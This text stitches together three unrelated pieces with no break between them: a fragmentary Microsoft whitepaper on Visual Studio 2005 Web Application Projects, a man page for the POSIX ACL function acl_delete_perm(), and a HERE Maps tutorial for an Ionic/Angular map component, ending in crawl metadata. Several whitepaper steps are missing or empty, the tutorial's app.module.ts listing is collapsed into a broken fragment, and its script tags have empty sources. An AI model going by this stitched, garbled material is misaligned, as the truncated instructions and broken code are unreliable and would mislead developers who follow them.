Summary: Find out how to use the new project type, the Web application project, as an alternative to the Web site project model already available in Visual Studio 2005. (27 printed pages)
Contents
Introduction
Purpose of Web Application Projects
In This Paper
This paper describes Web application projects and offers information on when you might choose between a Web application project and a Web site project model in Visual Studio 2005. The paper also walks you through the following common scenarios:
- Creating a new Web application project in Visual Studio 2005.
- Migrating an existing Visual Studio .NET 2003 project to a Visual Studio 2005 Web application project.
In addition, an appendix lists known issues with Web application projects.
Installing Web Application Projects
Adding Web application projects to Visual Studio 2005 requires you to install both an update and an add-in to Visual Studio 2005. The two installations perform the following tasks:
- The update makes changes to Visual Studio 2005 that are required so the Web project conversion wizard and designer will work well with Web application projects. You can download the update from the Microsoft Visual Studio 2005 - Update to Support Web Application Projects page on the Microsoft Download Center Web site.
- The add-in makes the new Web application projects available in Visual Studio 2005. You can download it from the Visual Studio 2005 Web Application Projects page on the ASP.NET Developer Center.
Comparing Web Site Projects and Web Application Projects
- Using FrontPage Server Extensions (FPSE). These are no longer required, but they are supported if your site already uses them.
- Using a local copy of IIS. The new project type supports both IIS and the built-in ASP.NET Development Server.
Scenario 1: Creating a New Web Application Project
This section walks you through creating a new Web application project. It also examines how page code is handled in a Visual Studio 2005 Web application project.
Note Web application projects do not work with Visual Web Developer Express Edition.
The examples shown here are in C#. The steps for working with Visual Basic are very similar, but file names and code will differ slightly.
Step 1: Create a New Project
Figure 1. Creating a new Web Application Project
Name the project and specify a location. When you click OK, Visual Studio creates and opens a new Web project with a single page named Default.aspx, an AssemblyInfo.cs file (.vb file), and a Web.config file.
Step 2: Open and Edit the Page
- You no longer have to switch the page to Design view to update the control declarations. The designer monitors both Design view and Source view and updates declarations appropriately.
- Control declarations in the base class of a page are honored and are not duplicated in a page's code-behind class.
Step 3: Build and Run the Project
Run the project in debug mode by pressing F5 or clicking Run in the Debug menu. By default, Web application projects use the built-in ASP.NET Development Server, using a random port as the root site.
Figure 4. Setting output build location
After building the project, you can examine the results. In Solution Explorer, click Show All Files:
Figure 5. Results of building a Web application project
This works the same as it does in Visual Studio .NET 2003 ASP.NET Web projects.
Setting Build and Deployment Properties for Web Application Projects
Customizing Deployment Options for Web Application Projects
Scenario 2: Migrating a Visual Studio .NET 2003 Web Project to a Web Application Project
Step 1: Install the Visual Studio 2005 Web Application Project Preview
Be sure you have installed Web Application Projects in Visual Studio 2005 by following the steps in the Installing Web Application Projects section earlier in this paper.
Step 2: Back Up Your Visual Studio .NET 2003 Projects
Step 4: Migrate the Solution to Visual Studio 2005
Close the solution in Visual Studio .NET 2003, and then start Visual Studio 2005. On the File menu, click Open File, and then browse to the .sln file for the solution you want to migrate. This launches the Visual Studio 2005 Conversion wizard.
- Close the browser.
- In Solution Explorer, right-click the application's start page and then click Set as Start Page to ensure that the correct page is invoked when the application runs.
- Run the application again.
Step 6: Convert Code-Behind Classes to Partial Classes
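To illustrate what this conversion produces (a sketch; the page, file, and control names here are hypothetical, not taken from the article): in a Visual Studio 2005 Web application project, each page's code-behind becomes a partial class, and the control declarations that Visual Studio .NET 2003 kept in the code-behind move to a generated designer file.

```csharp
// Default.aspx.cs -- the half you edit.
using System;

public partial class _Default : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        // Label1 is no longer declared in this file; see the designer file below.
        Label1.Text = "Hello from a partial class";
    }
}

// Default.aspx.designer.cs -- the generated half holding control declarations.
public partial class _Default
{
    protected global::System.Web.UI.WebControls.Label Label1;
}
```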
Step 7:
The Future of Web Application Projects
- Going forward, we will fully support both the Visual Studio 2005 Web site project model and Visual Studio 2005 Web application project model. You can choose whichever model works best for you.
- In future versions of Visual Studio, the Web application project model will be built in, and both the Web application project model and Web site project model will be supported.
Appendix A: Known Issues
This appendix lists known issues with Web application projects.
Issue 1: Data Scenarios
- There are known issues when using data-bound controls and SQL Server 2005 Express with the April 2006 release of Web application projects. For a list of issues and workarounds, see the whitepaper named "Using Data-Bound Controls and SQL Server Express with Web Application Projects," which is available on the Visual Studio 2005 Web Application Projects page on the ASP.NET Developer Center.
Issue 2: Visual Basic Inline Code Might Not Be Converted Correctly
Issue 3: WSE and Web Application Projects
- Start the configuration tool. In the Windows Start menu, click All Programs, click Microsoft WSE 3.0, and then click Configuration Tool.
- In the configuration tool, in the File menu, click Open.
- Select the Web.config file for the project.
Issue 4: Converting the Club Web Site Starter Kit (Visual Basic)
To add a namespace to an individual page:
- Open the page.
- Under the last @ Register directive, add an @ Import directive that references the namespace you want to use, as in the following example:
<%@ Register
<%@ Import Namespace="wap1" %>
To add a namespace to the project:
- Open the Web.config file.
- Add or edit the <namespaces> element as a child of the <pages> element, as in the following example:
<pages>
  <namespaces>
    <add namespace="wap1"/>
  </namespaces>
</pages>
Issue 5: Converting the Personal Web Site Starter Kit (Visual Basic)
- Open the Member_List.aspx page.
- Change the type name in the ObjectDataSource declaration to be fully qualified, as in the following example:
<asp:ObjectDataSource TypeName="wap1.MemberDetails" >
Issue 6: Converting a Visual Studio 2005 Web Site Project to a Web Application Project
acl_delete_perm - Delete permissions from a set of permissions belonging to an ACL entry
Security Library (libpacl.a)
#include <sys/acl.h>
int acl_delete_perm(
acl_permset_t perms,
acl_perm_t perm_d);
perms
Specifies the permission set of the working storage internal representation ACL entry.
perm_d
Specifies the file permissions to be deleted (a combination of ACL_EXECUTE, ACL_READ, and ACL_WRITE).
NOTE: This function is based on Draft 13 of the POSIX P1003.6 standard. The function may change as the P1003.6 standard is finalized.
The acl_delete_perm() function deletes the specified permission in perm_d from the permission set. This function does not return an error if the ACL entry does not have any of the specified permissions turned on.
Upon successful completion, the acl_delete_perm() function returns a value of 0 (zero). Otherwise, a value of -1 is returned, and errno is set to indicate the error.
If either of the following conditions occurs, the acl_delete_perm() function sets errno to the corresponding value:
[EINVAL] The perms parameter does not refer to a valid permission set.
The perm_d parameter does not contain valid file permission bits.
acl_add_perm(3), acl_clear_perm(3),acl_get_permset(3), acl_set_permset(3), acl_get_entry(3)
Security
Back when I first started at HERE, I had written a tutorial titled Display HERE Maps within your Angular Web Application. In fact, it was my first official tutorial since starting, and since then I've received several similar requests around it. One popular request has been around taking the Angular web application and making it compatible with Ionic Framework.
In this tutorial we’re going to see how to build a progressive web application (PWA) using Ionic Framework that can be deployed on the web or on mobile devices running Android or iOS.
Take the following animated image of what we plan to accomplish:
As you can see, we have an interactive map available in both a web browser and on an Android device. This is the same application with the same code, running on both platforms. While we’re only showing an interactive map, it opens the door to further possibilities with the HERE JavaScript SDK.
Start a New Ionic Framework Project with the Ionic CLI
The first step towards being successful with this tutorial is to create a new project. We’re going to be using the Ionic CLI and we’re going to be building an Ionic 3.x application that uses Angular. Other versions of Ionic Framework will likely have different setup requirements.
Assuming you have the Ionic CLI installed, execute the following command:
The above command will create a blank project. While we won’t be using any Ionic plugins or third-party Angular dependencies, we will need to include some libraries to make use of HERE in our application.
Open the project’s src/index.html and include the following HERE JavaScript SDK dependencies:
<script src="" type="text/javascript" charset="utf-8"></script>
<script src="" type="text/javascript" charset="utf-8"></script>
<script src="" type="text/javascript" charset="utf-8"></script>
These libraries should be included within the
<body> tags, above the other libraries defined by the Ionic CLI. When finished, our src/index.html file should look like the following:
<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
    <meta charset="UTF-8">
    <title>HERE Map Example</title>
    <meta name="viewport" content="viewport-fit=cover,">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <script src="cordova.js"></script>
    <link href="build/main.css" rel="stylesheet">
</head>
<body>
    <ion-app></ion-app>
    <script src="" type="text/javascript" charset="utf-8"></script>
    <script src="" type="text/javascript" charset="utf-8"></script>
    <script src="" type="text/javascript" charset="utf-8"></script>
    <script src="build/polyfills.js"></script>
    <script src="build/vendor.js"></script>
    <script src="build/main.js"></script>
</body>
</html>
Before proceeding to the next development steps, now would be a good opportunity to create a HERE developer account and obtain your application tokens. You’ll need both an app id and an app code for JavaScript to be able to use any of the HERE APIs.
Creating a HERE Map Component with Angular and Ionic Framework
Now that we have a basic project created for Ionic Framework, we need to create an Angular component to represent our HERE map. As seen in my previous tutorial, there are several ways to accomplish this in Angular, but for us, we should probably create an actual component that can be reused.
From the Ionic CLI, execute the following:
The above command will create an Angular component, configured for Ionic Framework. Eventually we’ll be able to use
<here-map> throughout the pages of our application.
Open the project’s src/components/here-map/here-map.html file and include the following:
<div #map style="width: 100%; height: 100%;"></div>
The above line will act as a placeholder for our interactive map. We are giving it full height and width so that it scales to the parent dimensions found in each of the pages that you create. The
#map attribute will allow us to find it in our TypeScript code.
Open the project’s src/components/here-map/here-map.ts file and include the following TypeScript logic:
import { Component, OnInit, ViewChild, ElementRef, Input } from '@angular/core';

declare var H: any;

@Component({
    selector: 'here-map',
    templateUrl: 'here-map.html'
})
export class HereMapComponent implements OnInit {

    @ViewChild("map") public mapElement: ElementRef;

    @Input() public appId: any;
    @Input() public appCode: any;
    @Input() public lat: any;
    @Input() public lng: any;

    public constructor() { }

    public ngOnInit() { }

    public ngAfterViewInit() {
        // Configure the platform with the credentials passed in as tag attributes
        let platform = new H.service.Platform({
            "app_id": this.appId,
            "app_code": this.appCode
        });
        // Render the map into the #map element, centered on the supplied coordinates
        let defaultLayers = platform.createDefaultLayers();
        let map = new H.Map(
            this.mapElement.nativeElement,
            defaultLayers.normal.map,
            {
                zoom: 10,
                center: { lat: this.lat, lng: this.lng }
            }
        );
        // Enable pan and zoom interactions on the map
        let behavior = new H.mapevents.Behavior(new H.mapevents.MapEvents(map));
    }

}
If you think the above TypeScript looks familiar, it is because I took it exactly from the previous Angular tutorial that I had written. As a refresher, we’ll walk through it again to explain what everything means.
First you’ll notice this line:
declare var H: any;
Because our JavaScript SDK doesn’t have any TypeScript type definitions, we need to declare the class we wish to use so we don’t get transpiler errors. Basically we’re saying to ignore the fact that
H won’t be recognized in TypeScript.
Remember that
#map we had in the HTML? The following line will allow us to gain access to it:
@ViewChild("map") public mapElement: ElementRef;
The
ViewChild matches the name, but the variable can be whatever you want. Each of the
Input annotations will reflect possible tag attributes to be passed when we try to use the
<here-map> tag.
Because the map will render after our view has finished loading, we have to do all of our logic in the
ngAfterViewInit method. In this method we configure the platform and display the map based on the information supplied as tag attributes.
Before we can start using our new component, we need to wire it up to Ionic Framework. As of now it is only an Angular component.
Open the project’s src/app/app.module.ts file and include'; @NgModule({ declarations: [ MyApp, HomePage ], imports: [ BrowserModule, ComponentsModule, IonicModule.forRoot(MyApp) ], bootstrap: [IonicApp], entryComponents: [ MyApp, HomePage ], providers: [ StatusBar, SplashScreen, {provide: ErrorHandler, useClass: IonicErrorHandler} ] }) export class AppModule {}
Notice in the above code that we have imported our
ComponentsModule and then added it to the
imports array of the
@NgModule block. That is the only change we’ve made to this file.
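For reference, the ComponentsModule itself was generated by the Ionic CLI when we created the component. It should look roughly like the following sketch from a typical Ionic 3 project (shown here as an assumption, not copied from the generated file):

```typescript
import { NgModule } from '@angular/core';
import { HereMapComponent } from './here-map/here-map';

@NgModule({
    declarations: [HereMapComponent],
    imports: [],
    exports: [HereMapComponent]
})
export class ComponentsModule {}
```

As long as the component is both declared and exported here, importing ComponentsModule makes the `<here-map>` tag available to every page module that needs it.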
Use the Interactive HERE Map Component within Ionic Framework Pages
With the map component under control, now we can start using it in the pages of our application. We’re working with a blank project so we’ll have a single page to work with. Your project may vary and you’re definitely not limited to just a single page.
Open the project’s src/pages/home/home.html file and include the following:
<ion-header>
    <ion-navbar>
        <ion-title>
            HERE Maps Example
        </ion-title>
    </ion-navbar>
</ion-header>

<ion-content>
    <here-map appId="APP-ID-HERE" appCode="APP-CODE-HERE" lat="37.7397" lng="-121.4252"></here-map>
</ion-content>
Take note of the
<here-map> tag that we’re using. In this tag we’re passing our attributes which we’re catching on the other end. Just make sure you swap your app id and app code rather than use my placeholder values.
Conclusion
You just saw how to include an interactive HERE map in an Ionic Framework progressive web application (PWA). Out of the box you should be able to build for the web with the Ionic CLI, but if you wish to build for Android or iOS, you’ll need to have Apache Cordova and the various Apache Cordova requirements met. However, you won’t have to change any of your code once Apache Cordova is configured.
For this example we were using the HERE JavaScript SDK rather than the HERE Android SDK or HERE iOS SDK. | https://developer.here.com/blog/display-an-interactive-here-map-in-an-ionic-framework-application | CC-MAIN-2021-25 | refinedweb | 1,268 | 53 |